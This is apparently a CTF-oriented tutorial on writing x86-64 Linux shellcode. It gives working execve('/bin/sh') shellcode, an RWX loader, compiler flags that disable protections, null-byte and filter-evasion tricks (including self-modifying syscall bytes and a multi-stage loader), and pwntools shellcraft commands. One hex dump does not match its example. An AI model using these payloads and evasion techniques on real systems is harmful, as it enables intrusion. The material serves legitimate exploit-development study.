I have faith of who ever reading this article is not a layman, you are probably familiar with CTFs, overflowed the buffer and smashed the stack once, and knowing what you are getting your self into. I assume you know what a CTF challenge is, x86 assembly basics, and using linux.
The term “shellcode” originates from the common objective of an exploit usually
to execute a command shell /bin/sh. the code is written in an assembly
language.
#execve("/bin/bash",{NULL},{NULL})
.text
.global _start
_start:
mov rax, 0x68732f6e69622f
push rax
push rsp
pop rdi
xor eax, eax
push rax
mov al, 59
push rsp
pop rdx
push rsp
pop rsi
syscallLooking at his code for a first time is intimidating, and scary. but once you learn how to read it, writing the shellcode would be the easiest part of the job.
How does it execute
shellcode is simply executable bytes, it is a machine instructions assembled to perform a small task once control is hijacked.
In today’s computers, there are two architectures, Von Neumann, which sees and stores code as data. And Harvard architectures that stores data and code separately.
almost all general purpose architectures (x86, ARM, MIPS, etc..) are Von Neumann. That would be the focus of this article.
Starting out, we will use a simple shellcode loader to test and execute our shellcode.
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h> // for read()
int main(void) {
// 1. Allocate an executable memory page.
// PROT_READ | PROT_WRITE | PROT_EXEC: The memory can be read, written to, and executed.
// MAP_PRIVATE | MAP_ANON: The mapping is private to this process and not backed by a file.
void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0);
if (page == MAP_FAILED) {
perror("mmap failed");
return 1;
}
printf("[+] Memory allocated at: %p\n", page);
// 2. Read shellcode from standard input (stdin) into the allocated page.
printf("[+] Reading shellcode from stdin...\n");
ssize_t bytes_read = read(STDIN_FILENO, page, 4095);
if (bytes_read <= 0) {
perror("read failed or no input provided");
return 1;
}
printf("[+] Read %ld bytes. Executing now...\n", bytes_read);
// 3. Create a function pointer to the page and call it.
// This transfers execution to the shellcode.
void (*shellcode_func)() = page;
shellcode_func();
// This line will likely not be reached if the shellcode exits.
return 0;
}Shellcode is just bytes. If you want to execute it, those bytes must live in memory marked as executable.
the mmap call is important, if we requested a memory without PROT_EXEC The
moment the program tried to execute the code at page, the CPU’s memory
management unit would see the “No-Execute” permission on that memory page and
trigger a protection fault, resulting in a SIGSEGV.
We are asking for a single page (0x1000 bytes) of memory that is
- Writable: we load shellcode bytes into it using
read - Executable: the CPU will happily
jmpinto it without complaining.
void *page = mmap(
NULL, // Let the kernel choose the address
4096, // One page = 4096 bytes (common page size)
PROT_READ | PROT_WRITE | PROT_EXEC, // Permissions: read, write, execute
MAP_PRIVATE | MAP_ANON, // Private mapping, not backed by a file
-1, // File descriptor (-1 since it's anonymous)
0 // Offset (not used here)
);The code is not compiled using the default gcc configuration, by default,
modern compilers have protection against shellcode, you need to disable when
compiling the program.
gcc -ggdb -g3 execute.c -fno-stack-protector -z execstack -no-pie -fno-pie -o execute
Using checksec, we see the Stack: Executable. That means that the data on the
stack could be treated as code.
$ pwn checksec --file=execute
[*] '/tmp/test/execute'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
SHSTK: Enabled
IBT: Enabled
Stripped: No
Debuginfo: Yes
Writing Shellcode
Before i start to write shellcode, i open loads documentation, syscall tables, and the manual for whatever assembly architecture i am writing. To mention a few, I use the Systrack: Linux kernel syscall tables for system calls lookups. And felix cloutier’s x86 and amd64 instruction reference, It’s easier to navigate, but the offical intel manual also works.
When writing shellcode, your goal is to execute Syscalls. Syscalls = system calls. They’re the special functions your program uses to talk to the kernel.
readto ask kernel to read from a file.writeto ask kernel to write to a file.execveto ask the kernel to run another program.exitto tell kernel you’re done and exit cleanly.
Syscalls are functions, like any other functions, the take parameters. It is not
as easy as function(arg1, arg2, arg3), but you learn to do it.
Call convention for x86 and x86_64 architechtures:
| ARCH | RETURN | ARG0 | ARG1 | ARG2 | ARG3 | ARG4 | ARG5 |
|---|---|---|---|---|---|---|---|
| x86 | eax | ebx | ecx | edx | esi | edi | ebp |
| x64 | rax | rdi | rsi | rdx | r10 | r8 | r9 |
To execute shellcode, You lookup the syscall number you want, the simplist
example is exit() syscall, looking it up in a man page you find this
definition
exit - cause normal process termination
#include <stdlib.h>
[[noreturn]] void exit(int status);
It takes only one parameter, exit status. On unix-like systems, a successful
exit is exit(0), so lets write that in shellcode. Never mind the first 3
lines, they are important for the compiler not for us for this case.
.intel_syntax noprefix
.global _start
_start:
mov rax, 60 # syscall for exit
syscall # execute the shellcodeCompile the shellcode using the following.
gcc -nostdlib -static hello.S -o hello.elf
This will create an elf file, inspect it and see the disassembly code.
objdump.
$ objdump -d -Mintel hello.elf
hello.elf: file format elf64-x86-64
Disassembly of section .text:
0000000000401000 <_start>:
401000: 48 c7 c0 3c 00 00 00 mov rax,0x3c
401007: 0f 05 syscall
We only want the .text section of the elf file. to extract it use objdump
objcopy --dump-section .text=hello.bin hello.elf
Use xxd to get compiled code
$ xxd hello.bin
00000000: 48c7 c078 0000 00bb 0200 0000 4831 db6a H..x........H1.j
00000010: 785f x_You can run the elf file just like any other linux program. it exits with
status 0, to check the status echo $?.
./hello.elf
echo $?
# 0For more logging use strace to see the syscalls get executed.
strace ./hello.elf
# execve("./hello.elf", ["./hello.elf"], 0x7ffe3fbd8560 /* 73 vars */) = 0
# exit(0) = ?
# +++ exited with 0 +++Now enough with long introduction, Lets get into the notes.
Problems you would run into when writing shellcode
Here are some of the common problems that you will run into eventually when you are writing shellcode.
Size constraints (Byte budget hell)
Your goal is to use the smallest number of bytes as possible.
XOR Instruction
Be careful of using mov too much. To zero out a register, do not use the
instruction mov. Use xor instead.
mov al,0x0 ; b0 00
mov ax,0x0 ; 66 b8 00 00
mov eax,0x0 ; b8 00 00 00 00
mov rax,0x0 ; 48 c7 c0 00 00 00 00
xor al,al ; 30 c0
xor ax,ax ; 66 31 c0
xor eax,eax ; 31 c0
xor rax,rax ; 48 31 c0Push Pop
push something to the stack, and get it back by using pop
;; 7 bytes
mov rax, 0xbadc0de ; 48 c7 c0 de c0 ad 0b
;; 6 bytes
push 0xbadc0de ; 68 de c0 ad 0b
pop rax ; 58Use what you have
When you hijack the control flow of the code (e.g jmp rax) you may already
have some values stored at the registers. for example, when using the read
syscall, and rdx has a non-zero value. Use it as it is as the parameter
count. It is a sitiuation dependent but you get the point.
Strings
If you think strings are hard in C, well let me introduce you to x86_64.
I will use open syscall as an example.
# open("/flag", O_RDONLY)
mov rbx, 0x67616c662f # push /flag filename
push rbx
mov rax, 2 # open() syscall
mov rdi, rsp # point to first item on stack ("/flag")
mov rsi, 0 # NULL the second arg (O_RDONLY)
syscall # open("/flag", NULL)This 0x67616c662f is /flag. it’s in little endian. to reproduce it you have
to run the following command.
echo -ne "/flag" | rev | xxd -p
# 67616c662fThe down side is you will struggle with long strings as it may not fit in the registers. One other way using labels, I prefer this way but it may not always work.
# open("/flag", O_RDONLY)
push 2
pop rax # open syscall = 2
lea rdi, [rip+flag] # flag string
xor rsi, rsi # O_RDONLY = 0
syscall
flag:
.string "/flag"There is also building the string on the stack. almost always work, but it requires lots of work.
# open("/flag", O_RDONLY)
# push "flag" little endian to stack
push 0x67616C66
pop rax # rax = 0x0000000067616C66
# shift left 8 bits to make room for the '/' byte
shl rax, 8 # rax = 0x00000067616C6600
# load '/' (0x2F) into rbx using push/pop
push 0x2F
pop rbx # rbx = 0x...0000002F
# OR the '/' into the low byte
or rax, rbx # rax = 0x00000067616C662F
# push the 64-bit qword (stack gets "/flag\0\0\0" in little-endian)
push rax
push 2 # open syscall
pop rax
lea rdi, [rsp] # filename = "/flag"
xor rsi, rsi # mode_t = O_RDONLY
syscallInput filtering
Input maybe manipulated, filtered of some bytes before execution.
String termination & \x00ull bytes
One great resource i found is nets.ec/Shellcode/Null-free which has many great examples.
- Use xor instruction instead of
mov
This will use less bytes and not include null bytes.
# bad
mov rax, 0
# good
xor rax, rax- Use push and pop instructions instead of
mov
push 0x70
pop rax
syscall- Use shifting instructions
mov rdi, 0x68732f6e69622f6a ; move the 64-bit immediate into RDI ('hs/nib/j' in little-endian)
shr rdi, 8 ; logical right-shift RDI by 8 bits -> zero-terminates the low byte
push rdi ; push the 64-bit value (now contains "/bin/sh\0" when viewed as bytes)
push rsp ; push current RSP (stack pointer)
pop rdi ; pop that value into RDI -> RDI points at the pushed stringSelf modifying shellcode
One time i was solving a ctf challenge, and it filters the syscall bytes
0F 05. I wrote a shellcode that constructs the syscall bytes 0F 05 at
runtime so it won’t be filtered. The following code increments the 0e by 1, so
it becomes 0F and this way it bypasses the filter.
inc BYTE PTR [rip]
.byte 0x0e, 0x05NOP Padding
nop is an instruction that does nothing, sometimes you use it for padding,
aligning or whatever reason, it is useful.
.global _start
_start:
# Your code here
nop
nop
#...
nop
.fill 10, 1, 0x90 # 10 NOP instructions
# or
.rept 10
nop
.endr
# More code hereMulti stage shellcode
Some times there will be input filtering that it is impossible to write shellcode to do anything meaningful. One way to solve this problem is a multi stage shellcode. Write a stage 1 shellcode “Loader” that its job is to load another shellcode. Only the stage 1 gets filtered.
push 0
push 0
pop rax # read syscall
pop rdi # stdin
push rsp
pop rsi # rsi = rsp (buffer)
push 100
pop rdx
syscall
jmp rspUse Pwntools when possible
it has lots of functions that automates and eases the process of writing shellcode. sometimes you don’t need to write shellcode at all, it does it for you. But first you have to understand how the magic works, if not you will waste a lot of time. RTFM.
Pwn shellcraft
pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name
pwn shellcraft -f hex amd64.linux.sh #Create in C and run
pwn shellcraft -r amd64.linux.sh #Run to test. Get shellPwn template
i like to use pwn template command to generate a starting point for my
challenges.
then use the asm("") function to write the shellcode instead of compiling and
passing it by hand through the shell.
stage1 = asm("""# shellcode loader""")
stage2 = asm("""# actual shellcode""")
io.sendline(stage1)
pause(1)
io.sendline(stage2)
io.interactive()GDB Debugger
Using a debugger is essential. gdb is good but it lacks features, that is why i
recommend using pwndbg or gef with it. they help with visualisation and
provide functions that are useful for debugging.
gdbscript = f'''
# break points
#...
source /opt/gef/gef.py
continue
'''References
- https://shell-storm.org/shellcode/index.html
- https://pwn.college/program-security/program-security/
- https://www.felixcloutier.com/x86/
- https://syscalls.mebeim.net/?table=x86/64/x64/latest
- https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86
- https://nets.ec/Shellcode/Null-free
- https://book.hacktricks.wiki/en/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html